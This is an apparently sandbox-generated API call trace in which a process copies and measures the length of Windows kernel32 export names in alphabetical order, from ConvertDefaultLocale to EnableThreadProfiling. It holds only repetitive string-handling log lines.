[0185.681] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.681] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.681] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.681] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.681] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.681] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.681] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.681] lstrlenA (lpString="COPYFILEA") returned 9 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.681] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.681] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.681] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.681] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.681] lstrlenA (lpString="COPYFILEW") returned 9 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.681] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.681] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.681] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.681] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.681] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.681] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.682] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.682] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.682] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.682] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.682] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.682] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.682] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.682] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.682] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.682] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.682] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.682] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.682] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.682] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.682] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.682] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.682] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.682] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.682] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.682] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.683] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.683] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.683] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.683] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.683] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.683] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.683] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.683] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.683] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.683] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.683] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.683] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.683] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.683] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.683] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.683] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.683] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.683] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.683] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.683] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.684] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.684] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.684] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.684] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.684] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.684] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.684] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.684] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.684] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.684] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.684] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.684] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.684] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.684] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.684] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.684] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.684] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.684] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.684] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.684] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.685] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.685] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.685] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.685] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.685] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.685] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.685] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.685] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.685] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.685] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.685] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.685] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.685] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.685] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.685] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.685] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.685] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.685] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.685] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.685] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.686] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.686] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.686] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.686] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.686] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.686] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.686] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.686] lstrlenA (lpString="DELETEATOM") returned 10 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.686] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.686] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.686] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.686] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.686] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.686] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.686] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.686] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.686] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.686] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.686] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.687] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.687] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.687] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.687] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.687] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.687] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.687] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.687] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.687] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.687] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.687] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.687] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.687] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.687] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.687] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.687] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 